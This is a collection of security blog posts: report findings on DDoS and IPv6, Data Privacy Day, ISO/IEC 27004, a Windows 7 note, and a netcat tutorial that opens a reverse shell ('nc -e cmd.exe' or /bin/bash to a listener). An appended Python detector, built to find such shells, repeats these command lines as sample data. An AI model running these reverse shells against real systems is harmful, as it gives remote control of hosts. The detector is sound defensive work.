Posted on January 21, 2010 at 12:52h by paispe
2009 Worldwide Infrastructure Security Report
Key Findings
DDoS Bandwidth Growth Slows: Over the last six years, service providers reported a near doubling in peak distributed denial of service (DDoS) attack rates year-to-year. Figure 1 illustrates that peak attack rates grew from 400 Mbps in 2001 to more than 40 Gbps in 2007. This year, providers reported a peak rate of only 49 Gbps (a more modest 22 percent growth over the previous year). As we discuss later in the survey, the slowing in DDoS flood growth likely reflects attacks reaching underlying Internet physical constraints and a migration to other more effective denial of service attack vectors.
Attacks Shift to the Cloud: Again this year, more than half of the surveyed providers reported growth in service-level attacks at gigabit or lower bandwidth levels. Such attacks are specifically designed to exploit service weaknesses, like vulnerable and expensive back-end queries and computational resource limitations. Several ISPs reported prolonged (multi-hour) outages of prominent Internet services during the last year due to application-level attacks. These service-level attack targets included distributed domain name system (DNS) infrastructure, load balancers and large-scale SQL server back-end infrastructure.
The Internet Is Not IPv6-Ready: A majority of this year’s surveyed providers reported concerns over the security implications of IPv6 adoption and the slow rate of IPv4 to IPv6 migration. As in previous years, providers complained of missing IPv6 security features in routers, firewalls and other critical network infrastructure. Other providers worried the lack of IPv6 testing and deployment experience may lead to significant Internet-wide security vulnerabilities.
IPv4 Address Exhaustion, IPv6 Migration, DNSSEC Migration, 4-Byte ASN Migration: The ‘perfect storm’ of looming IPv4 address exhaustion, concerns surrounding migration to IPv6, concerns surrounding migration to Domain Name System Security Extensions (DNSSEC), and concerns surrounding migration to 4-byte ASNs is a source of uncertainty for respondents with regards to their ability to operate, maintain, secure and defend their networks.
Lack of Skilled Resources: Non-technical factors such as lack of skilled resources, internal/external communications siloing, lack of clearly defined operational responsibilities, lack of clearly defined policies, and lack of management understanding and commitment are the most significant obstacles to reducing mitigation times and proactively strengthening operational security postures.
Posted on January 15, 2010 at 10:54h by paispe
Data Privacy Day is an international holiday that occurs every January 28. The purpose of Data Privacy Day is to raise awareness and promote data privacy education. It is currently celebrated in the United States, Canada, and 27 European countries.
Source: Wikipedia
Intel, Microsoft, Google, AT&T, LexisNexis and The Privacy Projects are sponsoring Data Privacy Day efforts, with assistance from Intuit and Oracle. These companies and organizations, in addition to over 45 other businesses, privacy professionals, and academic institutions, are hosting Data Privacy Day events and taking steps to promote privacy awareness internally and in their communities.
http://dataprivacyday2010.org/blog/
Data Privacy Day is an international celebration of the dignity of the individual expressed through personal information. In this networked world, in which we are thoroughly digitized, with our identities, locations, actions, purchases, associations, movements, and histories stored as so many bits and bytes, we have to ask – who is collecting all of this – what are they doing with it – with whom are they sharing it? Most of all, individuals are asking ‘How can I protect my information from being misused?’ These are reasonable questions to ask – we should all want to know the answers.
http://dataprivacyday2010.org/
Posted on January 13, 2010 at 14:59h by paispe
ISO/IEC 27004 has just been published.
http://www.itgovernance.co.uk/products/2858
This standard provides guidance on the development and use of measures and measurement in order to assess the effectiveness of an ISMS. It also provides guidance on the measures and measurement for controls or groups of controls.
All of the advice and guidance within ISO/IEC 27004:2009 is designed to be used within the scope of ISO/IEC 27001.
Posted on January 13, 2010 at 10:38h by paispe
Posted on December 15, 2009 at 18:38h by paispe
Given two PCs, one with a public IP (we will call it PUB) and one with a private IP (we will call it PRV), behind NAT.
From the PC with the public IP you want access to the command line of the PC with the private IP.
We run nc on PUB with the parameters -lvp 1414:
-l listen mode, for inbound connects
-v verbose [use twice to be more verbose]
-p port local port number
On PRV we run nc with the parameters -v ipPUB port -e cmd.exe, where ipPUB is the public address of PUB and port is the one set above (1414).
If the operating system were Linux, instead of cmd.exe I could have chosen to execute /bin/bash.
-e prog inbound program to exec [dangerous!!]
At this point, on the command line of PUB, where I ran netcat with the -l parameter to listen for connections from outside on port 1414, I have the following (note that the prompt has changed to that of the PRV machine):
At this point, from the PUB machine I have access to the command line of the PRV machine (the virtual machine corresponds to the machine with the private IP in the example, and Windows 7 to the machine with the public IP):
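As an added defensive example, not part of the original post: a small scanner over constructed process-creation events that flags the netcat usage described above, that is nc started with -e (or the equivalent exec flags) handing a shell to a remote listener or to inbound connections. Host names, addresses and command lines are constructed sample data.

```python
import re

# Constructed sample process-creation events (host, command line), in the form an
# EDR or Sysmon-style log would record them; addresses are documentation ranges.
SAMPLE_EVENTS = [
    ("PRV", "nc -v 203.0.113.10 1414 -e cmd.exe"),      # the post's reverse shell
    ("PUB", "nc -lvp 1414"),                            # plain listener, no exec
    ("LNX", "nc -v 203.0.113.10 1414 -e /bin/bash"),    # Linux variant from the post
    ("DEV", "nc -zv 10.0.0.5 22"),                      # port check, benign
    ("DEV", "grep -e pattern file.txt"),                # -e on a non-netcat binary
]

NETCAT_BINARIES = {"nc", "ncat", "netcat", "nc.exe", "ncat.exe"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "bash", "sh", "zsh"}
SHORT_CLUSTER = re.compile(r"^-[a-zA-Z]+$")   # e.g. -lvp, -nlvp

def basename(path):
    """Last path component, tolerant of Windows and POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(cmdline):
    """Return 'reverse_shell', 'bind_shell' or None for one command line.

    Whitespace-split only: paths containing spaces must be normalised by the collector.
    """
    argv = cmdline.split()
    if not argv or basename(argv[0]) not in NETCAT_BINARIES:
        return None
    exec_prog, listening = None, False
    for i, arg in enumerate(argv[1:], 1):
        if arg in EXEC_FLAGS and i + 1 < len(argv):
            exec_prog = argv[i + 1]            # program handed to the peer
        elif arg == "--listen" or (SHORT_CLUSTER.match(arg) and "l" in arg.lower()):
            listening = True                   # -l inside a cluster such as -lvp
    if exec_prog is None or basename(exec_prog) not in SHELLS:
        return None
    return "bind_shell" if listening else "reverse_shell"

def find_netcat_shells(events):
    """Scan (host, cmdline) pairs; return (host, kind, cmdline) for each hit."""
    hits = []
    for host, cmd in events:
        kind = classify(cmd)
        if kind is not None:
            hits.append((host, kind, cmd))
    return hits

if __name__ == "__main__":
    for host, kind, cmd in find_netcat_shells(SAMPLE_EVENTS):
        print(f"{host}: {kind}: {cmd}")
```

The same rule set can be fed from a real process-creation feed; the listener on PUB without -e is deliberately not flagged, since only the exec flag turns netcat into a shell.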
Posted on December 11, 2009 at 16:38h by paispe
Posted on December 10, 2009 at 23:55h by paispe
I have joined the ranks of the world and put 64-bit Windows 7 Enterprise on my work laptop.
At first glance it looks good, it runs well, and it sees all my 4 GB of RAM, unlike XP.
I can't say much more about it, because I have only just installed Office, Firefox, Pidgin and IrfanView on it.
It remains to be seen.
But I have joined the ranks of the world.
